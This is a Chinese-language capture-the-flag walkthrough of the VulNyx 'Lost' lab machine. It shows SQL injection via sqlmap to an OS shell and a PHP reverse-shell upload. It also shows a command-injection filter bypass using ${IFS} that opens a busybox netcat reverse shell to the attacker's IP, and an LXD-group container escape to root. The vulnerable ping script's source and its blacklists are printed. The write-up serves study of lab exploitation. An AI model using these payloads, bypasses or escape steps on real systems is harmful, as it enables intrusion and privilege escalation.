Lost
攻击机ip:192.168.108.50
靶机地址:https://vulnyx.com/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 Kal ddddx ~ ❯ export ip=192.168.108.138 at 13:40:52 Kal ddddx ~ ❯ rustscan -a $ip at 13:43:22 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-' `-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- Port scanning: Because every port has a story to tell. [~] The config file is expected to be at "/home/ddddx/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan' s speed. Use the Docker image, or up the Ulimit with '--ulimit 5000' .Open 192.168.108.138:22 Open 192.168.108.138:80 [~] Starting Script(s) [~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 13:43 CST Initiating ARP Ping Scan at 13:43 Scanning 192.168.108.138 [1 port] Completed ARP Ping Scan at 13:43, 0.08s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 13:43 Completed Parallel DNS resolution of 1 host. at 13:43, 0.00s elapsed DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 13:43 Scanning 192.168.108.138 [2 ports] Discovered open port 22/tcp on 192.168.108.138 Discovered open port 80/tcp on 192.168.108.138 Completed SYN Stealth Scan at 13:43, 0.03s elapsed (2 total ports) Nmap scan report for 192.168.108.138 Host is up, received arp-response (0.00062s latency). Scanned at 2025-06-10 13:43:27 CST for 0s PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:7E:00:92 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Read data files from: /usr/share/nmap Nmap done : 1 IP address (1 host up) scanned in 0.31 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
开放了80端口和20端口,访问80端口,发现只有一张图片,访问源码说尝试让我们枚举更多域名,先将已经得到的lost.nyx 域名后,添加到 /etc/hosts
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 Kal ddddx ~ ❯ ffuf -u http://192.168.108.138 -H "Host: FUZZ.lost.nyx" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 819 /'___\ /' ___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://192.168.108.138 :: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt :: Header : Host: FUZZ.lost.nyx :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 819 ________________________________________________ dev [Status: 200, Size: 9936, Words: 3426, Lines: 295, Duration: 48ms] :: Progress: [114441/114441] :: Job [1/1] :: 1005 req/sec :: Duration: [0:02:01] :: Errors: 0 ::
禁用tun,将dev.lost.nyx也写入hosts访问一下,注意到passanger list页面有让我们输入一个ID来查看乘客的详细信息,在角色页面又有发现4个角色,分别是Jack Shephard ,John Locke,Kate Austen ,Hugo"Hurley Reyes"
使用sqlmap判断是否存在注入点,发现存在注入,试着列出全部用户,注意手动的是基于布尔逻辑注入,而 sqlmap 默认尝试 error-based 或 union-based,可能不奏效,指定注入方式为布尔盲注或时间盲注–technique=B
发现虽然可以列出但是列到最后查询字段时无法列出
那我们就使用sqlmap注入漏洞获取操作系统的 shell
1 2 3 4 Kal ddddx ~ ❯ sqlmap -u http://dev.lost.nyx/passengers.php\?id \=1 --os-shell Kal ddddx ~ ❯ vi php-reverse-shell.php Kal ddddx ~ ❯ python -m http.server 80 Kal ddddx ~ ❯ curl http://dev.lost.nyx/php-reverse-shell.php
传入shell,curl一下,成功获取到交互页面
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 (remote) www-data@lost:/$ id uid=33(www-data) gid=33(www-data) groups =33(www-data) (remote) www-data@lost:/$ whoami www-data (remote) www-data@lost:/$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync :x:4:65534:sync :/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin jackshephard:x:1000:1000:jack shephard,,,:/home/jackshephard:/bin/bash messagebus:x:100:107::/nonexistent:/usr/sbin/nologin sshd:x:101:65534::/run/sshd:/usr/sbin/nologin johnlocke:x:1001:1001::/home/johnlocke:/bin/bash mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false _lxd:x:103:111::/var/lib/lxd/:/bin/false dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
尝试提权,查看网络连接状态,发现开放一个3000端口
1 2 3 4 5 6 7 8 (remote) www-data@lost:/$ ss -luntp Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 4096 127.0.0.1:3000 0.0.0.0:* tcp LISTEN 0 128 [::]:22 [::]:* tcp LISTEN 0 511 *:80 *:*
有socat就不用传了,尝试暴露此端口,发现是个ping的程序,尝试注入恶意命令,发现在执行前就被检测到了,开始尝试绕过
1 2 3 4 (remote) www-data@lost:/tmp$ which socat /usr/bin/socat (remote) www-data@lost:/tmp$ socat TCP-LISTEN:4000,fork TCP4:127.0.0.1:3000 & (remote) www-data@lost:/tmp$ socat TCP-LISTEN:4000,fork TCP4:127.0.0.1:3000
使用wfuzz 爆破一下,这里屏蔽666和645两个正常回显,由于是ping命令排除非重复回显,最后尝试得出直接|后接命令可以绕过
1 2 3 4 5 Kal ddddx ~ ❯ wfuzz -H "Content-Type: application/x-www-form-urlencoded" \ took 15s at 16:02:47 -d "ip=FUZZ" \ -w /usr/share/wordlists/wfuzz/Injections/All_attack.txt \ -u http://dev.lost.nyx:4000/ \ --hh 666,645
尝试往攻击机上发一个reverse shell 有busybox
但尝试使用一些反向shell都以失败告终,发现都会被识别,尝试往1|id后面加空格,发现也被识别为恶意代码,猜测对空格进行了过滤,使用url编码进行绕过发现失效,考虑到在shell中,使用${IFS}进行对空格的替代
1 1|busybox${IFS} nc${IFS} 192.168.108.50${IFS} 4444${IFS} -e${IFS} sh
进入之后我们可以拿到ping页面的源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 (remote) jackshephard@lost:/opt/pinged$ cat pinged.php <!DOCTYPE html> <html lang="en" > <head > <meta charset="UTF-8" > <meta name="viewport" content="width=device-width, initial-scale=1.0" > <title>Ping Tool</title> <style> body { background-image: url('numbers.gif' ); background-size: cover; background-repeat: no-repeat; } </style> </head> <body> <h1>Ping the Lost IP's</h1> <form action="" method="POST"> <label for="ip">Enter the IP address to ping:</label><br> <input type="text" id="ip" name="ip"><br> <input type="submit" value="Ping"> </form> <?php if(isset($_POST[' ip'])){ echo "<hr /><br />"; // remove common special characters that are used $blacklist = array (" ","&",",","@",";","^","~","`","<",">",",","\\","/"); $input = $_POST[' ip']; $containsMaliciousInput = false; foreach ($blacklist as $char) { if (strpos($input, $char) !== false) { $containsMaliciousInput = true; break; } } // Add blacklisted commands $blacklistedCommands = array("ls","cat","less","tail","more","whoami","pwd","busybox","echo","id"); if (in_array($input, $blacklistedCommands)) { $containsMaliciousInput = true; } if ($containsMaliciousInput) { echo "Malicious input/command detected"; } else { $output = shell_exec("ping -c 1 ".$input); if(isset($_GET["debug"]) == true){ echo "<div>ping -c 1 ".$input."</div>"; } echo "<pre>".$output."</pre>"; } } ?> </body> </html>
1 2 3 $blacklist = array (" " ,"&" ,"," ,"@" ,";" ,"^" ,"~" ,"`" ,"<" ,">" ,"," ,"\\" ,"/" );$blacklistedCommands = array("ls" ,"cat" ,"less" ,"tail" ,"more" ,"whoami" ,"pwd" ,"busybox" ,"echo" ,"id" );$output = shell_exec("ping -c 1 " .$input );
之前影响操作的解释这两段黑名单,这里使用的精确匹配所有只对完整的字符串过滤,没有处理拼接也没检测子串,同时shell_exec 会拼接字符串直接执行命令,因此是 命令注入高危点 。
1 2 (remote) jackshephard@lost:/opt/pinged$ id uid=1000(jackshephard) gid=1000(jackshephard) groups =1000(jackshephard),111(lxd)
发现用户属于lxd组,这代表可以使用 LXD 容器逃逸技术 yaml_path 指定 Alpine v3.8 的版本,来避免了新版本的校验问题,构建镜像
1 2 3 4 git clone https://github.com/saghul/lxd-alpine-builder at 14:37:24 cd lxd-alpine-buildersed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine sudo ./build-alpine -a i686
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 lxc image import <file.tar.gz> --alias alpine 导入一个本地 tar.gz 格式的容器镜像,并起一个别名叫 alpine。这可以让后续基于该镜像快速创建容器。 lxc image list 列出当前系统中已导入的镜像,用于确认 alpine 是否存在。 lxc init alpine privesc -c security.privileged=true 初始化一个名为 privesc 的容器实例,基于 alpine 镜像。 并设置容器为 privileged 模式(提权关键点之一): 在 privileged 模式下,容器内的 UID/GID 不再做映射,容器内的 root 用户就是真正的宿主机 root,从而可能可以突破隔离。 lxc config device add privesc boxbox disk source =/ path=/mnt/root recursive=true 把宿主机的 根目录 / 映射到容器内的 /mnt/root,这个操作的意思是: 容器中的 /mnt/root 就可以访问到宿主机的文件系统。 recursive=true 表示连同子目录、挂载点等全部包含进来。 设备名称是 boxbox(自定义) ⚠️ 这是另一个提权关键点,容器能直接访问宿主机文件系统。 lxc start privesc 启动名为 privesc 的容器 lxc exec privesc sh 进入容器执行一个 sh shell,开始在容器中操作。
在容器中的/mnt/root下可以看到映射进来的根目录,接下来就可以进root看flag了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 /mnt/root backups etc lib mnt run tmp vmlinuz.old bin home lib64 opt sbin usr boot initrd.img lost+found proc srv var dev initrd.img.old media root sys vmlinuz /mnt/root backups/ etc/ lib/ mnt/ run/ tmp/ vmlinuz.old bin/ home/ lib64/ opt/ sbin/ usr/ boot/ initrd.img lost+found/ proc/ srv/ var/ dev/ initrd.img.old media/ root/ sys/ vmlinuz /mnt/root /mnt/root/root root.txt /mnt/root/root 74cc1c60799e0a786ac7094b532f01b1
如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !
